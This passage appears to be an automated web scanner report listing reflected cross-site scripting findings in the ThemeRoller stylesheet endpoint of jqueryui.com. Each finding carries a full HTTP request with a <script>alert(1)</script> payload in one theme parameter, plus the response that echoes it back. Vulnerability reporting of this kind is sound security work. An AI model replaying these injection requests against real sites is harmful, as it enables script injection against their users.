GET /themeroller/css/parseTheme.css.php?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=4040406456d<script>alert(1)</script>154306ee43d&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:01 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 17804

/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
ImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=4040406456d<script>alert(1)</script>154306ee43d&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a
*/

/* Component contain
...[SNIP]...

1.211. http://jqueryui.com/themeroller/css/parseTheme.css.php [borderColorHover parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/css/parseTheme.css.php

Issue detail

The value of the borderColorHover request parameter is copied into the HTML document as plain text between tags. The payload fce18<script>alert(1)</script>52d1a3f7398 was submitted in the borderColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=ddddddfce18<script>alert(1)</script>52d1a3f7398&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:45 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 17804

/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=ddddddfce18<script>alert(1)</script>52d1a3f7398&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=55555
...[SNIP]...

1.212. http://jqueryui.com/themeroller/css/parseTheme.css.php [cornerRadius parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/css/parseTheme.css.php

Issue detail

The value of the cornerRadius request parameter is copied into the HTML document as plain text between tags. The payload c3d42<script>alert(1)</script>7894e4ccfcd was submitted in the cornerRadius parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5c3d42<script>alert(1)</script>7894e4ccfcd&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:15 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 18829

/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify this theme, visit http://jqueryui.com/themeroller/?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5c3d42<script>alert(1)</script>7894e4ccfcd&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureCont
...[SNIP]...

1.213. http://jqueryui.com/themeroller/css/parseTheme.css.php [cornerRadiusShadow parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/css/parseTheme.css.php

Issue detail

The value of the cornerRadiusShadow request parameter is copied into the HTML document as plain text between tags. The payload 60ff1<script>alert(1)</script>75be290cc19 was submitted in the cornerRadiusShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?ffDefault=Trebuchet+MS,+Tahoma,+Verdana,+Arial,+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px60ff1<script>alert(1)</script>75be290cc19 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:26 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 18126

/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
verlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px60ff1<script>alert(1)</script>75be290cc19
*/

/* Component containers
----------------------------------*/
.ui-widget { font-family: Trebuchet MS, Tahoma, Verdana, Arial, sans-serif; font-size: 1.1em; }
.ui-widget input, .ui-widget select, .
...[SNIP]...

1.214. http://jqueryui.com/themeroller/css/parseTheme.css.php [cornerRadiusUnit parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/css/parseTheme.css.php

Issue detail

The value of the cornerRadiusUnit request parameter is copied into the HTML document as plain text between tags. The payload d3c52<script>alert(1)</script>445d4d1b2e6 was submitted in the cornerRadiusUnit parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=pxd3c52<script>alert(1)</script>445d4d1b2e6&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:15 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 18829

/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify this theme, visit http://jqueryui.com/themeroller/?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=pxd3c52<script>alert(1)</script>445d4d1b2e6&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.pn
...[SNIP]...

1.215. http://jqueryui.com/themeroller/css/parseTheme.css.php [ctl parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/css/parseTheme.css.php

Issue detail

The value of the ctl request parameter is copied into the HTML document as plain text between tags. The payload 1442f<script>alert(1)</script>ef11e82e504 was submitted in the ctl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?ctl=themeroller1442f<script>alert(1)</script>ef11e82e504 HTTP/1.1
Accept: */*
Referer: http://jqueryui.com/themeroller/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: jqueryui.com
Proxy-Connection: Keep-Alive
Cookie: __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmb=77982607.2.10.1289873280; __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmc=77982607

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:11:21 GMT
Content-Type: text/css
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 16599

/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify this theme, visit http://jqueryui.com/themeroller/?ctl=themeroller1442f<script>alert(1)</script>ef11e82e504
*/

/* Component containers
----------------------------------*/
.ui-widget { font-family: Verdana,Arial,sans-serif; font-size: 1.1em; }
.ui-widget input, .ui-widget select, .ui-widget textarea, .ui-
...[SNIP]...

1.216. http://jqueryui.com/themeroller/css/parseTheme.css.php [fcActive parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/css/parseTheme.css.php

Issue detail

The value of the fcActive request parameter is copied into the HTML document as plain text between tags. The payload 46429<script>alert(1)</script>0418f0c6ca5 was submitted in the fcActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff46429<script>alert(1)</script>0418f0c6ca5&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:53 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 17845

/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
g&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff46429<script>alert(1)</script>0418f0c6ca5&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=f
...[SNIP]...

1.217. http://jqueryui.com/themeroller/css/parseTheme.css.php [fcContent parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/css/parseTheme.css.php

Issue detail

The value of the fcContent request parameter is copied into the HTML document as plain text between tags. The payload 79b56<script>alert(1)</script>cdf5961ed62 was submitted in the fcContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee79b56<script>alert(1)</script>cdf5961ed62&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:31 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 17845

/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
acityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee79b56<script>alert(1)</script>cdf5961ed62&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTex
...[SNIP]...

1.218. http://jqueryui.com/themeroller/css/parseTheme.css.php [fcDefault parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/css/parseTheme.css.php

Issue detail

The value of the fcDefault request parameter is copied into the HTML document as plain text between tags. The payload 652a9<script>alert(1)</script>a5ffbabd6c0 was submitted in the fcDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333652a9<script>alert(1)</script>a5ffbabd6c0&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:34 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 17845

/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
tent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333652a9<script>alert(1)</script>a5ffbabd6c0&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=
...[SNIP]...

1.219. http://jqueryui.com/themeroller/css/parseTheme.css.php [fcError parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/css/parseTheme.css.php

Issue detail

The value of the fcError request parameter is copied into the HTML document as plain text between tags. The payload 3b3b2<script>alert(1)</script>3834a03bc29 was submitted in the fcError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a3b3b2<script>alert(1)</script>3834a03bc29&iconColorError=cd0a0a HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:20 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 17886

/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
